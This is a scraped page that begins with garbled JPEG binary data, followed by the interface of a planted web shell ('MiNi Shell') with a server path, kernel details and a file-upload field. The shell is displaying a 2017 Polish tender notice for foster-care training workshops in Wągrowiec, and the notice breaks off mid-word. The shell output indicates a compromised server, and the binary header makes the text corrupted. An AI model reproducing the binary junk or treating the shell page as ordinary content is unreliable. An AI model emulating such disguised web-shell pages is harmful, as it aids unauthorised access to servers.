JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20171011/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20171011/600555-N-2017.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 600555-N-2017 z dnia 2017-10-11 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Powiatowe Centrum Pomocy Rodzinie</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Organizacja i przeprowadzenie szkoleń, warsztatów stacjonarnych i wyjazdowych dla rodzinnych form pieczy zastepczej - uczestników " Projektu poprawiającego dostęp do usług wsparcia rodziny i i systemu pieczy zastepczej, usług opiekuńczych i asystenckich w powiecie wągrowieckim" współfinansowanego z Europejskiego Funduszu Społecznego w ramach Wielkopolskiego Regionalnego Programu Operacyjnego na lata 2014-2020</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Tak</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu">Projekt poprawiający dostęp do usług wsparcia rodziny i systemu pieczy zastepczej, usług opiekuńczych i asystenkich w powiecie wągrowieckim</span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Tak</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Powiatowe Centrum Pomocy Rodzinie</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">63955178000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Wierzbowa</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">1</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">62100 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Wągrowiec</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">wielkopolskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">67 26 27 614</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">lucynaostapiuk@pcpr.wagrowiec.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">67 26 27 614</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.pcpr.wagrowiec.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Jednostki organizacyjne administracji samorządowej</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.pcpr.wagrowiec.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.pcpr.wagrowiec.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Wymagane jest złożenie ofert w formie papierowej na adres: Powiatowe Centrum Pomocy Rodzinie w Wągrowcu, ul. Wierzbowa 1, 62-100 Wągrowiec, pokój nr 6 - sekretariat</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres"></span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Organizacja i przeprowadzenie szkoleń, warsztatów stacjonarnych i wyjazdowych dla rodzinnych form pieczy zastepczej - uczestników " Projektu poprawiającego dostęp do usług wsparcia rodziny i i systemu pieczy zastepczej, usług opiekuńczych i asystenckich w powiecie wągrowieckim" współfinansowanego z Europejskiego Funduszu Społecznego w ramach Wielkopolskiego Regionalnego Programu Operacyjnego na lata 2014-2020</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">PC.252.I.2017</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci">I część zamówienia: Warsztaty stacjonarne dla rodzin zastępczych i rodzinnych domów dziecka z powiatu wągrowieckiego; II część zamówienia: Cztery warsztaty wjazdowe dla rodzinnych form pieczy zastępczej z powiatu wągrowieckiego; III część zamówienia: Warsztaty stacjonarne dla rodzinnych form pieczy zastępczej - przeciwdziałanie uzależnieniom.</span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy">3</span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">I część zamówienia: Warsztaty stacjonarne dla rodzin zastępczych i rodzinnych domów dziecka z powiatu wągrowieckiegoWarsztaty obejmują łącznie 30 modułów, w tym 1 moduł wynosi 8h szkoleniowych, uwzględniający co najmniej 1 przerwę na obiad i 2 przerwy kawowe. Problematyka warsztatów obejmuje między innymi:- uzależnienia od narkotyków, dopalaczy, alkoholu, Internetu oraz inne cywilizacyjne zagrożenia,- prowadzenie rozmów o dojrzewaniu, seksualności i związanych z tym zagrożeniami, specyfika przemocy seksualnej oraz aspekty prawne,- praca nad własnym stylem komunikowania się z dzieckiem w sytuacjach trudnych,- sposoby interwencji w sytuacjach kryzysowych w rodzinie zastępczej, granice, normy i zasady w wychowaniu - jak je ustalać i egzekwować,- stosowanie kar i nagród w wychowaniu - sposoby nagradzania i delegowania odpowiedzialności ,- stosowanie techniki naturalnych i logicznych konsekwencji,- wypracowanie systemu współpracy wychowawczej w relacjach rodzina zastępcza - Koordynator rodziny zastępczej. W jednym module warsztatowym uczestniczyć będzie maksymalnie 30 osób. W zakresie kwalifikacji specjalistów wymagane jest wykształcenie wyższe kierunkowe, zgodnie z przedmiotem zamówienia, min. 2 letnie doświadczenie w poradnictwie rodzinnym. Zamówienie obejmuje:a.	Wynagrodzenie trenera 240h łącznie w 30 modułach, w kosztach wynagrodzenia należy uwzględnić zapewnienie przez prowadzącego: listy obecności, zaświadczeń z ukończenia szkolenia, materiały dla uczestników szkolenia - notatnik z długopisem 1 kpl. dla każdej osoby przez cały okres trwania szkolenia. b.	Wynajem Sali na terenie miasta Wągrowca, wyposażonej w niezbędne meble: stoły, krzesła, pozwalające jednorazowo uczestniczyć w szkoleniu 30 osobom, z dostępem do pomieszczeń sanitarnych wyposażonych w podstawowe środki higieny: papier toaletowy, ręczniki papierowe ( suszarka do rąk ), mydło do rąk. Sala wyposażona w projektor multimedialny. c.	Catering dla każdej osoby uczestniczącej w szkoleniu ( obiad 1 daniowy ), kawa herbata, woda, susz konferencyjny, naczynia jednorazowe. W zakresie dostawy cateringu muszą być spełnione dwa warunki:- dostawca cateringu musi być Podmiotem Ekonomii Społecznej, zgodnie z definicją zawartą w Wytycznych w zakresie przedsięwzięć w obszarze włączenia społecznego i zwalczania ubóstwa z wykorzystaniem środków Europejskiego Funduszu Społecznego i Europejskiego Funduszu Rozwoju Regionalnego na lata 2014 - 2020, - dostawca cateringu musi posiadać uprawnienia do prowadzenia działalności będącej przedmiotem zamówienia - usług cateringu.Miejsce szkoleń - miasto Wągrowiec.Termin realizacji szkoleń od podpisania umowy tj. przybliżony termin pierwszy weekend listopada 2017 roku do grudnia 2018 roku, w tym 10 modułów w 2017 roku i 20 modułów w 2018r. w systemie weekendowym - sobota w godzinach 12.00 do 20.00II część zamówienia: Cztery warsztaty wjazdowe dla rodzinnych form pieczy zastępczej z powiatu wągrowieckiego.Wszystkie spośród czterech wyjazdów zorganizowanie muszą być na terenie województwa Wielkopolskiego, z wyłączeniem powiatu wągrowieckiego. Wymagania dotyczące transportu: Zapewnienie transportu na trasie Wągrowiec - miejsce docelowe, miejsce docelowe - Wągrowiec. Autokar powinien być sprawny technicznie, wykonawca usługi transportu posiada wszelkie uprawnienia do wykonywania odpłatnego transportu drogowego, stosownie do treści ustawy z dnia 6 września 2001 r. o transporcie drogowym (Dz. U. z 2016 r. poz. 1907 z późn. zm.). W przypadku awarii pojazdu lub innej nieprzewidzianej sytuacji, prowadzącej do niepodstawienia właściwego środka transportu, Wykonawca ma obowiązek zapewnić przewóz autokarowy zastępczy bez dodatkowej opłaty. Wymagania odnośnie bazy lokalowej: Obiekt oraz teren (gdzie ma być zorganizowane szkolenie ), muszą spełniać wymogi dotyczące bezpieczeństwa, ochrony przeciwpożarowej, warunków higieniczno-sanitarnych oraz ochrony środowiska określone przepisami o ochronie przeciwpożarowej, Państwowej Inspekcji Sanitarnej i ochronie środowiska. Zamawiający wyklucza zakwaterowanie w ośrodkach o niskim standardzie. Uczestnicy winni zostać zakwaterowani w pokojach 2, 3 i 4 osobowych (osobne łóżka), z pełnym węzłem sanitarnym (natrysk, umywalka, WC), bieżąca ciepła woda przez całą dobę, stały dostęp do papieru toaletowego, co najmniej dwa ręczniki. Zamawiający nie dopuszcza kwaterowania w pokojach wyposażonych w łóżka piętrowe, łoża małżeńskie lub kanapy traktowane jako 2 miejsca do spania. Na terenie Ośrodka musi znajdować się kryty basen rekreacyjny, wanna z hydromasażem, sauna, pokój zabaw dla dzieci. Wymagania żywieniowe:Zapewnienie pełnego wyżywienia uczestnikom w każdym dniu pobytu tj. trzy posiłki dziennie: śniadanie w formie stołu szwedzkiego winno zawierać co najmniej: pieczywo ciemne i jasne, 1 danie ciepłe np. parówki, jajecznica, naleśniki; wędliny różne, sery różne, masło, dżemy, płatki śniadaniowe, mleko ciepłe i zimne, świeże warzywa i owoce, kawa herbata, itp.; dwudaniowy obiad z napojem, Kolacje winny zawierać co najmniej: pieczywo ciemne i jasne, przystawki różne, ewentualne dania ciepłe, wędliny różne, sery różne, świeże warzywa i owoce, woda mineralna, kawa zbożowa, herbata. Liczba posiłków adekwatna do dni pobytu. Wymagania odnośnie ubezpieczenia:Wykonawca zapewnia ubezpieczenie NNW, obejmujące moment wyjazdu uczestników z miejsca zbiórki do momentu przyjazdu powrotnego. Wykonawca ubezpieczy wszystkich uczestników wyjazdu na kwotę minimum 10.000 zł na osobę, Wykonawca przed rozpoczęciem wyjazdu przedstawi potwierdzenie zawarcia ubezpieczenia NNW wraz ze wskazaniem sposobu ubiegania się o ewentualną wypłatę środków. Wymagania dotyczące kadry: W zakresie kwalifikacji specjalistów wymagane jest wykształcenie wyższe kierunkowe, zgodnie z przedmiotem zamówienia, min. 2 letnie doświadczenie w poradnictwie rodzinnym.Wykaz kadry musi zawierać informacje o kwalifikacjach i doświadczeniu zawodowym w pracy z rodziną i wychowankami w rodzinie. W przypadku konieczności zmiany w obsadzie kadrowej, Wykonawca jest zobowiązany poinformować o tym Zamawiającego oraz przedłożyć dokumenty dotyczące odpowiednich uprawnień, Zamawiający zastrzega możliwość sprawdzenia dokumentów potwierdzających kwalifikacje oraz doświadczenia kadry prowadzącej zajęcia. Wykonawca zapewni jedną osobę, która będzie sprawować bezpośredni nadzór nad prawidłową realizacją w trakcie wyjazdu. Opieka medyczna: Dostęp do opieki lekarskiej w ramach ubezpieczenia zdrowotnego poprzez zapewnienie w koniecznych przypadkach opieki lekarskiej, polegającej na wezwaniu do ośrodka lekarza lub niezwłocznym dowiezieniu uczestnika do punktu opieki zdrowotnej. Na terenie ośrodka musi znajdować się apteczka wyposażona w środki pierwszej pomocy. Wymagane dokumenty: 1/. Informacja o miejscowości oraz nazwie ośrodka do którego będzie wyjazd wraz z danymi kontaktowymi do tego ośrodka, 2/. Program i harmonogram pobytu uwzględniający zajęcia dla opiekunów i wychowanków. 1/. Warsztat wyjazdowy dla rodzinnych form pieczy zastępczej z rodzin zawodowych i rodzinnych domów dziecka. W warsztacie uczestniczyć będą łącznie 84 osoby, w tym 28 opiekunów i 56 wychowanków z rodzin zastępczych zawodowych i rodzinnych domach dziecka. Problematyka warsztatu: ,, Trudności w procesie usamodzielnienia pełnoletnich wychowanków pozostających w rodzinach zastępczych", Przedmiot zamówienia obejmuje: 1/. zakwaterowanie i wyżywienie dla 84 osób przez 3 pełne doby,2/. zapewnienie transportu z miejsca wyjazdu ( Wągrowiec- siedziba PCPR ul. Wierzbowa 1 ) do miejsca zakwaterowania i z miejsca zakwaterowania do Wągrowca - siedziby PCPR ),3/. zapewnienie Sal szkoleniowych dla czterech grup, 4/. zapewnienie co najmniej 4 trenerów dla poszczególnych grup szkoleniowych: a.	rodziców zastępczych: I grupa - 14 osób x 20h szkolenia, II grupa - 14 osób x 20h szkolenia, b.	wychowanków w rodzinach zastępczych, dzieci biologicznych ( otoczenie ): I grupa 23 osoby x 20h szkolenia, II grupa - 23 osoby x 20h szkolenia.5/. zapewnienie materiałów szkoleniowych dla każdej osoby na które składają notatnik i długopis, listy obecności, zaświadczeń dla każdej osoby z ukończenia szkolenia z potwierdzeniem na liście odbioru zaświadczenia, poczęstunku, zakwaterowania, wyżywienia i transportu. 6/. zapewnienie drobnego poczęstunku w trakcie szkoleń dla grupy rodziców (kawa, herbata, woda, susz konferencyjny, naczynia jednorazowe ), dla wychowanków w rodzinach: woda, napoje, susz konferencyjny, naczynia jednorazowe),7/. zapewnienie animatora zajęć ( w tym osoby do opieki, zgodnie z obowiązującymi przepisami ) Dla około 10 dzieci w wieku od 3 do 7 lat przez 20h warsztatów, w których będą uczestniczyć opiekunowie. 8/. ubezpieczenie uczestników warsztatów przez cały okres pobytu.Planowany termin realizacji zamówienia: Marzec 2018r.2/. Warsztat wyjazdowy dla rodzinnych form pieczy zastępczej z rodzin spokrewnionych i niezawodowych.W warsztacie uczestniczyć będzie łącznie 80 osób, w tym 44 opiekunów i 36 wychowanków z rodzin zastępczych spokrewnionych i niezawodowych. Problematyka warsztatu: ,, Trudności w procesie usamodzielnienia pełnoletnich wychowanków pozostających w rodzinach zastępczych ,,. Przedmiot zamówienia obejmuje: 1/. zakwaterowanie i wyżywienie dla 80 osób przez 3 pełne doby,2/. zapewnienie transportu z miejsca wyjazdu ( Wągrowiec- siedziba PCPR ul. Wierzbowa 1 ) do miejsca zakwaterowania i z miejsca zakwaterowania do Wągrowca ( siedziby PCPR ),3/. zapewnienie Sal szkoleniowych dla czterech grup, 4/.zapewnienie co najmniej 4 trenerów dla poszczególnych grup szkoleniowych: c.	rodziców zastępczych: I grupa - 22 osoby x 20h szkolenia, II grupa - 22 osoby x 20h szkolenia, d.	wychowanków w rodzinach zastępczych, dzieci biologicznych ( otoczenie ): I grupa 13 osób x 20h szkolenia, II grupa - 13 osób x 20h szkolenia.5/. zapewnienie materiałów szkoleniowych dla każdej osoby na które składają notatnik i długopis, listy obecności, zaświadczeń dla każdej osoby z ukończenia szkolenia z potwierdzeniem na liście odbioru zaświadczenia, poczęstunku oraz zakwaterowania i wyżywienia, 6/. zapewnienie drobnego poczęstunku w trakcie szkoleń dla grupy rodziców (kawa, herbata, woda, susz konferencyjny, naczynia jednorazowe ), dla wychowanków w rodzinach: woda, napoje, susz konferencyjny, naczynia jednorazowe), 7/. zapewnienie osoby do opieki ( zgodnie z obowiązującymi przepisami ) animatora zajęć dla 10 dzieci w wieku od 3 do 7 lat przez 20h warsztatów, w których będą uczestniczyć opiekunowie. 8/. ubezpieczenie uczestników warsztatów przez cały okres pobytu.Planowany termin realizacji zamówienia: Kwiecień 